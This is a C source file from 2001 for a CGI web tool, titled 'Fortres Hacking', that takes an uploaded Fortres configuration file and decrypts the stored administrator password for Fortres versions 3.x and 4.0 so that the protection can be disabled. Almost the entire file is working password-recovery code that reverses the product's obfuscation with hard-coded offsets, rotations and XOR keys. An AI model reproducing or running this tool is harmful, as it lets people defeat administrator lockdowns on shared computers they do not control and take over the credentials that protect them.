/* This file is part of:
 *
 * fortres.cgi - A CGI application for decrypting administrator
 * passwords for disabling Fortres
 *
 * Copyright 2001 David Barksdale
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>

// Rotate left
unsigned char rotl(unsigned char x, unsigned long pos)
{
  return x << pos % 8 | x >> 8 - pos % 8;
}

int fortres3(unsigned const char *file, char *passwd, unsigned long len)
{
  unsigned long i, j;
  unsigned char buff[648], key[103];

  memcpy(key, file + 234, 103);
  memcpy(buff, file + 337, 648);
  for (i = 0, j = 0; i < 648; i++)
    buff[i] =
      rotl((unsigned char) (rotl(buff[i], i) ^ key[j = (j + 1) % 103]),
           i) ^ 0xB2;
  buff[16] = buff[97];
  buff[18] = buff[109];
  buff[20] = buff[73];
  buff[21] = buff[57];
  for (i = 0; i < len && buff[i + 16]; i++)
    passwd[i] = buff[i + 16] + 0x1B;
  if (passwd[i - 1] != 'C')
    return -1;
  passwd[i - 1] = '\0';
  return 0;
}

int fortres4(unsigned const char *file, char *passwd, unsigned long len)
{
  unsigned long i, j;

  for (i = 0, j = 4; i < len - 1; i++, j += 18) {
    passwd[i] = (char) (file[j] - file[454 - i] + i * 3);
    if (isalpha(passwd[i]) && !isupper(passwd[i]) || !isprint(passwd[i]))
      break;
  }
  passwd[i] = '\0';
  return i == 0 ? -1 : 0;
}

int shout(int err, char *text)
{
  printf("Content-Type: text/html\n\n"
         "<HTML>\n"
         "<HEAD>\n"
         "   <TITLE>Amatus' Provocative Chocolate - Fortres Hacking</TITLE>\n"
         "</HEAD>\n"
         "<BODY style=\"color:rgb(192,255,192)\" bgcolor=\"#000000\">\n");
  if (err)
    printf("<P style=\"color:red\">Error: %s</P>\n", text);
  else
    printf("<P>%s</P>\n", text);
  printf("</BODY>\n</HTML>\n");
  return err ? -1 : 0;
}

int main(void)
{
  char temp[100], passwd[64];
  unsigned char *buff, *file;
  unsigned int len, i;

  if (strcmp(getenv("REQUEST_METHOD"), "POST"))
    return shout(1, "Try the POST method next time");
  if (strncmp(getenv("CONTENT_TYPE"), "multipart/form-data", 19))
    return shout(1, "I don't recognise your CONTENT_TYPE");
  if ((len = atoi(getenv("CONTENT_LENGTH"))) > 16384)
    return shout(1, "Too much data");
  if ((buff = (unsigned char *) malloc(len + 1)) == NULL)
    return shout(1, "Too little memory");
  buff[len] = 0;
  fread(buff, 1, len, stdin);
  if ((file = strstr(buff, "name=\"file\"")) == NULL) {
    free(buff);
    return shout(1, "I don't understand your form data");
  }
  if ((file = strstr(file + 11, "\r\n\r\n")) == NULL) {
    free(buff);
    return shout(1, "I don't understand your form data");
  }
  file += 4;
  if (fortres3(file, passwd, 64) != -1) {
    sprintf(temp, "Fortres v3.x password: %s", passwd);
    free(buff);
    return shout(0, temp);
  }
  if (fortres4(file, passwd, 64) != -1) {
    sprintf(temp, "Fortres v4.0 password: %s", passwd);
    free(buff);
    return shout(0, temp);
  }
  free(buff);
  return shout(1, "I was unable to retreive the password");
}